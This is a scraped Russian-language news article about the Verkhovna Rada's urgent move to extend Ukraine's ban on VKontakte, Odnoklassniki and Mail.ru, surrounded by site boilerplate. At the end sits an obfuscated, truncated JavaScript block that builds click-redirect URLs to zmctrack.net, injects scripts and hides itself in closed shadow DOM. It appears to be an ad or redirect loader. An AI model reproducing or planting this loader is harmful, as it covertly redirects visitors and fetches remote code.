Warning: Parameter 2 to wp_hide_post_Public::query_posts_join() expected to be a reference, value given in /var/www/fastuser/data/www/glavpost.com/wp-includes/class-wp-hook.php on line 307

Действие запрета на Одноклассники и ВКонтакте в Украине истекает 15 мая

Новое заседание Верховной Рады срочно созывают из-за российских соцсетей. Сегодня депутаты хотят продлить действие запрета на российские веб-ресурсы в Украине.

“Сегодня собрали 150 подписей за то, чтобы мы приняли постановление Верховной Рады относительно поддержки санкций интернет-сервисов российских. Их срок заканчивается 15 мая, и чтобы не собираться в понедельник, я предлагаю сегодня последним вопросом созвать новое внеочередное (заседание. – Ред.) и просто проголосовать за это”, – сказал глава фракции “Слуга народа” Давид Арахамия.

После этого спикер парламента Дмитрий Разумков дал распоряжение аппарату Рады подготовить документ о созыве еще одного внеочередного заседания на сегодня. Оно должно пройти после окончания повестки дня текущего заседания.

Отметим, что решение о продлении запрета принимает президент на основании соответствующего решения Совета национальной безопасности. Секретарь СНБО в комментарии "Радио Свобода" заявил, что Совбез уже рассмотрел этот вопрос, "ждите указа президента".

Как сообщали новости "Сегодня", ранее СБУ предложила продлить запрет на российские соцсети и программное обеспечение. Глава Службы безопасности Украины Иван Баканов отмечал, что необходимо создать Единый реестр программного обеспечения, разрешенного для использования в государственных информационно-телекоммуникационных системах, и обеспечить его функционирование. Это позволит не только ограничить закупки и использование запрещенного ПО, но и создаст благоприятные условия для развития IT-сферы в Украине.

Читайте также:  Избиение Балуха: у Зеленского сделали жесткое заявление

В результате комитет Верховной Рады по вопросам национальной безопасности, обороны и разведки рекомендовал депутатам принять проект постановления №3319 о продлении запрета на российские соцсети.

Напомним, что некогда популярные в Украине веб-ресурсы "ВКонтакте", "Одноклассники" и Mail.ru находятся под запретом с 2017 года. Сайт "Сегодня" разбирался, нужны ли Украине российские соцсети и почему они могут быть очень опасными.

	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутаты

	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутаты

	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутаты

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Верховная Рада
соцсети
внеочередное заседание

Источник:

Сегодня

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыЕС не позвал Украину на саммит Восточного партнерства: названа причинаПолитика 	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыНацгвардии не разрешили обыскивать украинцев: Рада отклонила законопроектПолитика 	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыЗеленский анонсировал второй этап выхода из карантина: видео обращенияПолитика 	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыВерховная Рада приняла решение о выходе из карантинаПолитика 	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыБывший “слуга народа” подал в суд на Разумкова из-за банковского законаПолитика 	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутатыВ переговорах по Донбассу впервые участвовали депутаты РадыПолитика

Новости партнеров

Загрузка…

загрузка…

	Рада сегодня срочно проведет еще одно заседание: что рассмотрят депутаты

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Читайте также:  Зеленский и Путин договорятся: названа дата окончания войны на Донбассе

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня